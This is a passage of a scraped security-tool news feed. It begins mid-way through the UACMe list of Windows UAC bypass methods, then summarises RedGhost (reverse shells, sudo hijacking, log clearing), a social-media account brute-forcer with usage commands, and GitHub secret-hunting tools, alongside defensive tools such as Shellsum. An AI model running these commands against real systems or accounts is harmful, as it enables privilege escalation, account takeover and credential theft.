      • How: MitigationPolicy->ProcessImageLoadPolicy->PreferSystem32Images
  22. Author: Leo Davidson derivative
    • Type: Dll Hijack
    • Method: IFileOperation, SxS DotLocal
    • Target(s): \system32\consent.exe
    • Component(s): comctl32.dll
    • Implementation: ucmSXSMethod
    • Works from: Windows 7 (7600)
    • Fixed in: unfixed ,
      • How: -
  23. Author: Leo Davidson derivative
    • Type: Dll Hijack
    • Method: IFileOperation
    • Target(s): \system32\pkgmgr.exe
    • Component(s): DismCore.dll
    • Implementation: ucmDismMethod
    • Works from: Windows 7 (7600)
    • Fixed in: unfixed ,
      • How: -
  24. Author: BreakingMalware
    • Type: Shell API
    • Method: Environment variables expansion
    • Target(s): \system32\CompMgmtLauncher.exe
    • Component(s): Attacker defined
    • Implementation: ucmCometMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 RS2 (15031)
      • How: CompMgmtLauncher.exe autoelevation removed
  25. Author: Enigma0x3
    • Type: Shell API
    • Method: Registry key manipulation
    • Target(s): \system32\EventVwr.exe, \system32\CompMgmtLauncher.exe
    • Component(s): Attacker defined
    • Implementation: ucmHijackShellCommandMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 RS2 (15031)
      • How: EventVwr.exe redesigned, CompMgmtLauncher.exe autoelevation removed
  26. Author: Enigma0x3
    • Type: Race Condition
    • Method: File overwrite
    • Target(s): %temp%\GUID\dismhost.exe
    • Component(s): LogProvider.dll
    • Implementation: ucmDiskCleanupRaceCondition
    • Works from: Windows 10 TH1 (10240)
    • AlwaysNotify compatible
    • Fixed in: Windows 10 RS2 (15031)
      • How: File security permissions altered
  27. Author: ExpLife
    • Type: Elevated COM interface
    • Method: IARPUninstallStringLauncher
    • Target(s): Attacker defined
    • Component(s): Attacker defined
    • Implementation: ucmUninstallLauncherMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 RS3 (16199)
      • How: UninstallStringLauncher interface removed from COMAutoApprovalList
  28. Author: Exploit/Sandworm
    • Type: Whitelisted component
    • Method: InfDefaultInstall
    • Target(s): Attacker defined
    • Component(s): Attacker defined
    • Implementation: ucmSandwormMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 8.1 (9600)
      • How: InfDefaultInstall.exe removed from g_lpAutoApproveEXEList (MS14-060)
  29. Author: Enigma0x3
    • Type: Shell API
    • Method: Registry key manipulation
    • Target(s): \system32\sdclt.exe
    • Component(s): Attacker defined
    • Implementation: ucmAppPathMethod
    • Works from: Windows 10 TH1 (10240)
    • Fixed in: Windows 10 RS3 (16215)
      • How: Shell API update
  30. Author: Leo Davidson derivative, lhc645
    • Type: Dll Hijack
    • Method: WOW64 logger
    • Target(s): \syswow64\{any elevated exe, e.g wusa.exe}
    • Component(s): wow64log.dll
    • Implementation: ucmWow64LoggerMethod
    • Works from: Windows 7 (7600)
    • Fixed in: unfixed ,
      • How: -
  31. Author: Enigma0x3
    • Type: Shell API
    • Method: Registry key manipulation
    • Target(s): \system32\sdclt.exe
    • Component(s): Attacker defined
    • Implementation: ucmSdcltIsolatedCommandMethod
    • Works from: Windows 10 TH1 (10240)
    • Fixed in: Windows 10 RS4 (17025)
      • How: Shell API / Windows components update
  32. Author: xi-tauw
    • Type: Dll Hijack
    • Method: UIPI bypass with uiAccess application
    • Target(s): \Program Files\Windows Media Player\osk.exe, \system32\EventVwr.exe, \system32\mmc.exe
    • Component(s): duser.dll, osksupport.dll
    • Implementation: ucmUiAccessMethod
    • Works from: Windows 7 (7600)
    • Fixed in: unfixed ,
      • How: -
  33. Author: winscripting.blog
    • Type: Shell API
    • Method: Registry key manipulation
    • Target(s): \system32\fodhelper.exe, \system32\computerdefaults.exe
    • Component(s): Attacker defined
    • Implementation: ucmMsSettingsDelegateExecuteMethod
    • Works from: Windows 10 TH1 (10240)
    • Fixed in: unfixed ,
      • How: -
  34. Author: James Forshaw
    • Type: Shell API
    • Method: Environment variables expansion
    • Target(s): \system32\svchost.exe via \system32\schtasks.exe
    • Component(s): Attacker defined
    • Implementation: ucmDiskCleanupEnvironmentVariable
    • Works from: Windows 8.1 (9600)
    • AlwaysNotify compatible
    • Fixed in: unfixed ,
      • How: -
  35. Author: CIA & James Forshaw
    • Type: Impersonation
    • Method: Token Manipulations
    • Target(s): Autoelevated applications
    • Component(s): Attacker defined
    • Implementation: ucmTokenModification
    • Works from: Windows 7 (7600)
    • AlwaysNotify compatible, see note
    • Fixed in: Windows 10 RS5 (17686)
      • How: ntoskrnl.exe->SeTokenCanImpersonate additional access token check added
  36. Author: Thomas Vanhoutte aka SandboxEscaper
    • Type: Race condition
    • Method: NTFS reparse point & Dll Hijack
    • Target(s): wusa.exe
    • Component(s): dcomcnfg.exe, mmc.exe, ole32.dll, MsCoree.dll
    • Implementation: ucmJunctionMethod
    • Works from: Windows 7 (7600)
    • Fixed in: unfixed ,
      • How: -
  37. Author: Ernesto Fernandez, Thomas Vanhoutte
    • Type: Dll Hijack
    • Method: SxS DotLocal, NTFS reparse point
    • Target(s): \system32\dccw.exe
    • Component(s): GdiPlus.dll
    • Implementation: ucmSXSDccwMethod
    • Works from: Windows 7 (7600)
    • Fixed in: unfixed ,
      • How: -
  38. Author: Clement Rouault
    • Type: Whitelisted component
    • Method: APPINFO command line spoofing
    • Target(s): \system32\mmc.exe
    • Component(s): Attacker defined
    • Implementation: ucmHakrilMethod
    • Works from: Windows 7 (7600)
    • Fixed in: unfixed ,
      • How: -
  39. Author: Stefan Kanthak
    • Type: Dll Hijack
    • Method: .NET Code Profiler
    • Target(s): \system32\mmc.exe
    • Component(s): Attacker defined
    • Implementation: ucmCorProfilerMethod
    • Works from: Windows 7 (7600)
    • Fixed in: unfixed ,
      • How: -
  40. Author: Ruben Boonen
    • Type: COM Handler Hijack
    • Method: Registry key manipulation
    • Target(s): \system32\mmc.exe, \System32\recdisc.exe
    • Component(s): Attacker defined
    • Implementation: ucmCOMHandlersMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 19H1 (18362)
      • How: Side effect of Windows changes
  41. Author: Oddvar Moe
    • Type: Elevated COM interface
    • Method: ICMLuaUtil
    • Target(s): Attacker defined
    • Component(s): Attacker defined
    • Implementation: ucmCMLuaUtilShellExecMethod
    • Works from: Windows 7 (7600)
    • Fixed in: unfixed ,
      • How: -
  42. Author: BreakingMalware and Enigma0x3
    • Type: Elevated COM interface
    • Method: IFwCplLua
    • Target(s): Attacker defined
    • Component(s): Attacker defined
    • Implementation: ucmFwCplLuaMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 RS4 (17134)
      • How: Shell API update
  43. Author: Oddvar Moe derivative
    • Type: Elevated COM interface
    • Method: IColorDataProxy, ICMLuaUtil
    • Target(s): Attacker defined
    • Component(s): Attacker defined
    • Implementation: ucmDccwCOMMethod
    • Works from: Windows 7 (7600)
    • Fixed in: unfixed ,
      • How: -
  44. Author: bytecode77
    • Type: Shell API
    • Method: Environment variables expansion
    • Target(s): Multiple auto-elevated processes
    • Component(s): Various per target
    • Implementation: ucmVolatileEnvMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 RS3 (16299)
      • How: Current user system directory variables ignored during process creation
  45. Author: bytecode77
    • Type: Shell API
    • Method: Registry key manipulation
    • Target(s): \system32\slui.exe
    • Component(s): Attacker defined
    • Implementation: ucmSluiHijackMethod
    • Works from: Windows 8.1 (9600)
    • Fixed in: unfixed ,
      • How: -
  46. Author: Anonymous
    • Type: Race Condition
    • Method: Registry key manipulation
    • Target(s): \system32\BitlockerWizardElev.exe
    • Component(s): Attacker defined
    • Implementation: ucmBitlockerRCMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 RS4 (>16299)
      • How: Shell API update
  47. Author: clavoillotte & 3gstudent
    • Type: COM Handler Hijack
    • Method: Registry key manipulation
    • Target(s): \system32\mmc.exe
    • Component(s): Attacker defined
    • Implementation: ucmCOMHandlersMethod2
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 19H1 (18362)
      • How: Side effect of Windows changes
  48. Author: deroko
    • Type: Elevated COM interface
    • Method: ISPPLUAObject
    • Target(s): Attacker defined
    • Component(s): Attacker defined
    • Implementation: ucmSPPLUAObjectMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 RS5 (17763)
      • How: ISPPLUAObject interface method changed
  49. Author: RinN
    • Type: Elevated COM interface
    • Method: ICreateNewLink
    • Target(s): \system32\TpmInit.exe
    • Component(s): WbemComn.dll
    • Implementation: ucmCreateNewLinkMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 RS1 (14393)
      • How: Side effect of consent.exe COMAutoApprovalList introduction
  50. Author: Anonymous
    • Type: Elevated COM interface
    • Method: IDateTimeStateWrite, ISPPLUAObject
    • Target(s): w32time service
    • Component(s): w32time.dll
    • Implementation: ucmDateTimeStateWriterMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 RS5 (17763)
      • How: Side effect of ISPPLUAObject interface change
  51. Author: bytecode77 derivative
    • Type: Elevated COM interface
    • Method: IAccessibilityCplAdmin
    • Target(s): \system32\rstrui.exe
    • Component(s): Attacker defined
    • Implementation: ucmAcCplAdminMethod
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 10 RS4 (17134)
      • How: Shell API update
  52. Author: David Wells
    • Type: Whitelisted component
    • Method: AipNormalizePath parsing abuse
    • Target(s): Attacker defined
    • Component(s): Attacker defined
    • Implementation: ucmDirectoryMockMethod
    • Works from: Windows 7 (7600)
    • Fixed in: unfixed ,
      • How: -
  53. Author: Emeric Nasi
    • Type: Shell API
    • Method: Registry key manipulation
    • Target(s): \system32\sdclt.exe
    • Component(s): Attacker defined
    • Implementation: ucmShellDelegateExecuteCommandMethod
    • Works from: Windows 10 (14393)
    • Fixed in: unfixed ,
      • How: -
  54. Author: egre55
    • Type: Dll Hijack
    • Method: Dll path search abuse
    • Target(s): \syswow64\SystemPropertiesAdvanced.exe and other SystemProperties*.exe
    • Component(s): \AppData\Local\Microsoft\WindowsApps\srrstr.dll
    • Implementation: ucmEgre55Method
    • Works from: Windows 10 (14393)
    • Fixed in: unfixed ,
      • How: -
  55. Author: James Forshaw
    • Type: GUI Hack
    • Method: UIPI bypass with token modification
    • Target(s): \system32\osk.exe, \system32\msconfig.exe
    • Component(s): Attacker defined
    • Implementation: ucmTokenModUIAccessMethod
    • Works from: Windows 7 (7600)
    • Fixed in: unfixed ,
      • How: -
  56. Author: Hashim Jawad
    • Type: Shell API
    • Method: Registry key manipulation
    • Target(s): \system32\WSReset.exe
    • Component(s): Attacker defined
    • Implementation: ucmShellDelegateExecuteCommandMethod
    • Works from: Windows 10 (17134)
    • Fixed in: unfixed ,
      • How: -
  57. Author: Leo Davidson derivative by Win32/Gapz
    • Type: Dll Hijack
    • Method: IFileOperation
    • Target(s): \system32\sysprep\sysprep.exe
    • Component(s): unattend.dll
    • Implementation: ucmStandardAutoElevation
    • Works from: Windows 7 (7600)
    • Fixed in: Windows 8.1 (9600)
      • How: sysprep.exe hardened LoadFrom manifest elements
Note:
  • Method (6) unavailable in wow64 environment starting from Windows 8;
  • Method (11) (54) implemented only in x86-32 version;
  • Method (13) (19) (30) (38) (50) implemented only in x64 version;
  • Method (14) require process injection, wow64 unsupported, use x64 version of this tool;
  • Method (26) is still working, however it main advantage was UAC bypass on AlwaysNotify level. Since 15031 it is gone;
  • Method (30) require x64 because it abuses WOW64 subsystem feature;
  • Method (35) AlwaysNotify compatible as there always will be running autoelevated apps or user will have to launch them anyway;
  • Method (38) require internet connection as it executes remote script located at github.com/hfiref0x/Beacon/blob/master/uac/exec.html;
  • Method (55) is not really reliable (as any GUI hacks) and included just for fun.
Run examples:
  • akagi32.exe 1
  • akagi64.exe 3
  • akagi32 1 c:\windows\system32\calc.exe
  • akagi64 3 c:\windows\system32\charmap.exe

Warning
  • This tool shows ONLY popular UAC bypass method used by malware, and reimplement some of them in a different way improving original concepts. There are exists different, not yet known to general public methods, be aware of this;
  • Using (5) method will permanently turn off UAC (after reboot), make sure to do this in test environment or don't forget to re-enable UAC after tool usage;
  • Using (5), (9) methods will permanently compromise security of target keys (UAC Settings key for (5) and IFEO for (9)), if you do tests on your real machine - restore keys security manually after you complete this tool usage;
  • This tool is not intended for AV tests and not tested to work in aggressive AV environment, if you still plan to use it with installed bloatware AV soft - you use it at your own risk;
  • Some AV may flag this tool as HackTool, MSE/WinDefender constantly marks it as malware, nope;
  • If you run this program on real computer remember to remove all program leftovers after usage, for more info about files it drops to system folders see source code;
  • Most of methods created for x64, with no x86-32 support in mind. I don't see any sense in supporting 32 bit versions of Windows or wow64, however with small tweaks most of them will run under wow64 as well.
If you wondering why this still exist and work here is the explanation, an official Microsoft WHITEFLAG (including totally incompetent statements as bonus) https://blogs.msdn.microsoft.com/oldnewthing/20160816-00/?p=94105

Windows 10 support and testing policy
  • EOL'ed versions of Windows 10 are not supported and therefore not tested (at moment of writing EOL'ed Windows 10 versions are: TH1 (10240), TH2 (10586));
  • Insider builds are not supported as methods may be fixed there.

Protection
  • Account without administrative privileges.

Malware usage
  • It is currently known that UACMe used by Adware/Multiplug (9), by Win32/Dyre (3), by Win32/Empercrypt (10 & 13), by IcedID downloader (35 & 41). We do not take any responsibility for this tool usage in the malicious purposes. It is free, open-source and provided AS-IS for everyone.

Other usage
  • Currently used as "signature" by "THOR APT" scanner (handmade pattern matching fraudware from Germany). We do not take any responsibility for this tool usage in the fraudware;
  • The scamware project called "uacguard" has references to UACMe from their platform. We do not take any responsibility for this tool usage in the scamware. The repository https://github.com/hfiref0x/UACME and it contents are the only genuine source for UACMe code. We have nothing to do with external links to this project, mentions anywhere as well as modifications (forks);
  • In July 2016 so-called "security company" Cymmetria released report about script-kiddie malware bundle called "Patchwork" and false flagged it as APT. They stated it was using "UACME method", which in fact is just slightly and unprofessionally modified injector dll from UACMe v1.9 and was using Carberp/Pitou hybrid method in malware self-implemented way. We do not take any responsibility for UACMe usage in the dubious advertising campaigns from third party "security companies".

Build
  • UACMe comes with full source code, written in C with some parts written in C#;
  • In order to build from source you need Microsoft Visual Studio 2013/2015 U2 and later versions.

Instructions
  • Select Platform ToolSet first for project in solution you want to build (Project->Properties->General):
    • v120 for Visual Studio 2013;
    • v140 for Visual Studio 2015;
    • v141 for Visual Studio 2017.
  • For v140 and above set Target Platform Version (Project->Properties->General):
    • If v140 then select 8.1 (Note that Windows 8.1 SDK must be installed);
    • If v141 then select 10.0.17134.0 (Note that Windows 10.0.17134 SDK must be installed).
  • Note that Fujinami module built with .NET Framework 3.0 (this is requirement for it work), so .NET Framework 3.0 must be installed if you want to build this module.
  • Can be built with SDK 8.1/10.17134/10.17763.

References

Authors
(c) 2014 - 2019 UACMe Project


RedGhost v2.0 - Linux Post Exploitation Framework Designed To Assist Red Teams In Gaining Persistence, Reconnaissance And Leaving No Trace

July 17, 2019, 6:11 am
$
0
0

Linux post exploitation framework designed to assist red teams in persistence, reconnaissance, privilege escalation and leaving no trace.
  • Payloads
Function to generate various encoded reverse shells in netcat, bash, python, php, ruby, perl
  • SudoInject
Function to inject sudo command with wrapper function to run a reverse root shell everytime "sudo" is run for privilege escalataion
  • lsInject
Function to inject the "ls" command with a wrapper function to run payload everytime "ls" is run for persistence
  • Crontab
Function to create cron job that downloads payload from remote server and runs payload every minute for persistence
  • GetRoot
Function to try various methods to escalate privileges
  • Clearlogs
Function to clear logs and make investigation with forensics difficult
  • MassInfoGrab
Function to grab mass reconaissance/information on system
  • BanIp
Function to BanIp using iptables

Installation
one liner to install RedGhost:
wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; ./redghost.sh
One liner to install prerequisites and RedGhost:
wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; apt-get install dialog; apt-get install gcc; apt-get install iptables; ./redghost.sh

Prerequisites
dialog, gcc, iptables


Shellsum - A Defense Tool - Detect Web Shells In Local Directories Via Md5Sum

July 17, 2019, 2:42 pm
$
0
0

A defense tool - detect web shells in local directories via md5sum

Features
  • Fast speed
  • Lightweight
  • Big database
  • Tabled output

Usages
  • Install
git clone https://github.com/ManhNho/shellsum.git
chmod 755 -R shellsum/
cd shellsum/
pip install -r requirements.txt
  • Run
python shellsum.py


ToDo
  • Smooth output
  • Export file report
  • Modularization
  • Bigger database

References


Detect It Easy - Program For Determining Types Of Files For Windows, Linux And MacOS

July 18, 2019, 6:09 am
$
0
0

Detect It Easy, or abbreviated "DIE" is a program for determining types of files.
"DIE" is a cross-platform application, apart from Windows version there are also available versions for Linux and Mac OS.

Many programs of the kind (PEID, PE tools) allow to use third-party signatures. Unfortunately, those signatures scan only bytes by the pre-set mask, and it is not possible to specify additional parameters. As the result, false triggering often occur. More complicated algorithms are usually strictly set in the program itself. Hence, to add a new complex detect one needs to recompile the entire project. No one, except the authors themselves, can change the algorithm of a detect. As time passes, such programs lose relevance without the constant support.

Detect It Easy has totally open architecture of signatures. You can easily add your own algorithms of detects or modify those that already exist. This is achieved by using scripts. The script language is very similar to JavaScript and any person, who understands the basics of programming, will understand easily how it works. Possibly, someone may decide the scripts are working very slow. Indeed, scripts run slower than compiled code, but, thanks to the good optimization of Script Engine, this doesn't cause any special inconvenience. The possibilities of open architecture compensate these limitations.

DIE exists in three versions. Basic version ("DIE"), Lite version ("DIEL") and console version ("DIEC"). All the three use the same signatures, which are located in the folder "db". If you open this folder, nested sub-folders will be found ("Binary", "PE" and others). The names of sub-folders correspond to the types of files. First, DIE determines the type of file, and then sequentially loads all the signatures, which lie in the corresponding folder. Currently the program defines the following types:
  • MSDOS executable files MS-DOS
  • PE executable files Windows
  • ELF executable files Linux
  • MACH executable files Mac OS
  • Text files
  • Binary all other files
You could download binaries for Windows, Linux and Mac here: http://ntinfo.biz/


Brute_Force - BruteForce Gmail, Hotmail, Twitter, Facebook & Netflix

July 18, 2019, 3:15 pm
$
0
0


Install :
pip install proxylist

pip install mechanize

Usage:

BruteForce Gmail Attack
python3 Brute_Force.py -g Account@gmail.com -l File_list

python3 Brute_Force.py -g Account@gmail.com -p Password_Single

BruteForce Hotmail Attack
python3 Brute_Force.py -t Account@hotmail.com -l File_list

python3 Brute_Force.py -t Account@hotmail.com -p Password_Single

BruteForce Twitter Attack
python3 Brute_Force.py -T Account_Twitter -l File_list
python3 Brute_Force.py -T Account_Twitter -l File_list -X proxy-list.txt

BruteForce Facebook Attack
python3 Brute_Force.py -f Account_facebook -l File_list
python3 Brute_Force.py -f Account_facebook -l File_list -X proxy-list.txt

BruteForce Netflix Attack
يفضل تشغيل VPN
python3 Brute_Force.py -n Account_Netflix -l File_list
python3 Brute_Force.py -n Account_Netflix -l File_list -X proxy-list.txt


Search

Userrecon v1.1.0 - Recognition Usernames In 187 Social Networks

July 19, 2019, 5:15 am
$
0
0

Find usernames in 187 social networks.

Installation
  1. Install dependencies (Debian/Ubuntu):
sudo apt install python3 python3-pip
  1. Install with pip3:
sudo -H pip3 install git+https://github.com/decoxviii/userrecon-py.git
userrecon-py --help

Building from Source
Clone this repository, and:
git clone https://github.com/decoxviii/userrecon-py.git ; cd userrecon-py
sudo -H pip3 install -r requirements.txt
python3 setup.py build
sudo python3 setup.py install

Update
To update this tool to the latest version, run:
sudo -H pip3 install git+https://github.com/decoxviii/userrecon-py.git --upgrade
userrecon-py --version

Usage
Start by printing the available actions by running userrecon-py --help. Then you can perform the following tests:
userrecon-py --target decoxviii -o test_one
Watch this demo video

Thanks
This program is possible thanks to:

decoxviii
MIT


Kali NetHunter App Store - The New Android Store Dedicated to Free Security Apps

July 19, 2019, 2:25 pm
$
0
0

The Kali NetHunter App Store is a one-stop-shop for security relevant Android applications. It is the ultimate alternative to the Google Play store for any Android device, whether rooted or not, NetHunter or stock. If you are after any security application for your Android device, the NetHunter Store will be the place to get it.

The NetHunter store is powered by a slightly modified version of F-Droid, thanks to the hard work of the F-Droid community, in particular Peter Serwylo whose help was invaluable. Whilst F-Droid installs its clients with telemetry disabled and asks for consent before submitting crash reports, we went a step further and removed the entire code – just to make sure that our privacy cannot be compromised by accident. We also widened the inclusion policy to allow proprietary applications into the store.

Parrot Security 4.7 - Security GNU/Linux Distribution Designed with Cloud Pentesting and IoT Security in Mind

July 20, 2019, 6:01 am
$
0
0

Parrot is a GNU/Linux distribution based on Debian Testing and designed with Security, Development and Privacy in mind.


It includes a full portable laboratory for security and digital forensics experts, but it also includes all you need to develop your own software or protect your privacy while surfing the net.

Documentation

User Guide

Infrastructure Zone

Developer zone

Side projects

                

Git-Hound - Find Exposed Keys Across GitHub Using Code Search Keywords

July 20, 2019, 2:49 pm
$
0
0

A pattern-matching, batch-catching secret snatcher. This project is intended to be used for educational purposes.

Git Hound makes it easy to find exposed API keys on GitHub using pattern matching, targetted querying, and a scoring system.

Usage
echo "tillsongalloway.com" | python git-hound.py or python git-hound.py --subdomain-file subdomains.txt We also offer a number of flags to target specific patterns (known service API keys), file names (.htpasswd, .env), and languages (python, javascript).

Flags
  • --subdomain-file - The file with the subdomains
  • --output - The output file (default is stdout)
  • --output-type - The output type (requires output flag to be set; default is flatfile)
  • --all - Print all URLs, including ones with no pattern match. Otherwise, the scoring system will do the work.
  • --regex-file - Supply a custom regex file
  • --api-keys - Enable generic API key searching. This uses common API key patterns and Shannon entropy to find potential exposed API keys.
  • --language-file - Supply a custom file with languages to search.
  • --config-file - Custom config file (default is config.yml)
  • --pages - Max pages to search (default is 100, the page maximum)
  • --silent - Don't print results to stdout (most reasonably used with --output).
  • --no-antikeywords - Don't attempt to filter out known mass scans
  • --only-filtered - Only search filtered queries (languages, file extensions)

Setup
  1. Clone this repo
  2. Use a Python 3 environment (recommended: virtulenv or Conda)
  3. pip install -r requirements.txt (or pip3)
  4. Set up a config.yml file with GitHub credentials. See config.example.yml for an example. Accounts with 2FA are not currently supported.
  5. echo "tillsongalloway.com" | python git-hound.py


GitGot - Semi-automated, Feedback-Driven Tool To Rapidly Search Through Troves Of Public Data On GitHub For Sensitive Secrets

July 20, 2019, 3:00 pm
$
0
0

GitGot is a semi-automated, feedback-driven tool to empower users to rapidly search through troves of public data on GitHub for sensitive secrets.


How it Works
During search sessions, users will provide feedback to GitGot about search results to ignore, and GitGot prunes the set of results. Users can blacklist files by filename, repository name, username, or a fuzzy match of the file contents.
Blacklists generated from previous sessions can be saved and reused against similar queries (e.g., example.com v.s. subdomain.example.com v.s. Example Org). Sessions can also be paused and resumed at any time.
Read more about the semi-automated, human-in-the-loop design here: https://know.bishopfox.com/blog/going-semi-automated-in-an-automated-world-using-human-in-the-loop-workflows-to-improve-our-security-tools

Install Instructions
[1] Install the ssdeep dependency for fuzzy hashing.
Ubuntu/Debian (or equivalent for your distro):
apt-get install libfuzzy-dev ssdeep
or, for Mac OSX:
brew install ssdeep
For Windows or *nix distributions without the ssdeep package, please see the ssdeep installation instructions.
[2] After installing ssdeep, install the Python dependencies using pip:
pip3 install -r requirements.txt

Usage
GitHub requires a token for rate-limiting purposes. Create a GitHub API token with no permissions/no scope. This will be equivalent to public GitHub access, but it will allow access to use the GitHub Search API. Set this token at the top of gitgot.py as shown below:
ACCESS_TOKEN = "<NO-PERMISSION-GITHUB-TOKEN-HERE>"
After adding the token, you are ready to go:
# Query for the string "example.com" using the default RegEx list and logfile location (/logs/<query>.log)
./gitgot.py -q example.com

# Using GitHub advanced search syntax
./gitgot.py -q "org:github cats"

# Custom RegEx List and custom log files location
./gitgot.py -q example.com -f checks/default.list -o example1.log

# Recovery from existing session
./gitgot.py -q example.com -r example.com.state

# Using an existing session (w/blacklists) for a new query
./gitgot.py -q "Example Org" -r example.com.state

Query Syntax
GitGot queries are fed directly into the GitHub code search API, so check out GitHub's documentation for more advanced query syntax.

UI Commands
  • Ignore similar [c]ontent: Blacklists a fuzzy hash of the file contents to ignore future results that are similar to the selected file
  • Ignore [r]epo/[u]ser/[f]ilename: Ignores future results by blacklisting selected strings
  • Search [/(mykeyword)]: Provides a custom regex expression with a capture group to searches on-the-fly (e.g., /(secretToken))
  • [a]dd to Log: Add RegEx matches to log file, including all on-the-fly search results from search command
  • Next[<Enter>], [b]ack: Advances through search results, or returns to previous results
  • [s]ave state: Saves the blacklists and progress in the search results from the session
  • [q]uit: Quit


Viewing all 5854 articles
Browse latest View live
Search
<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>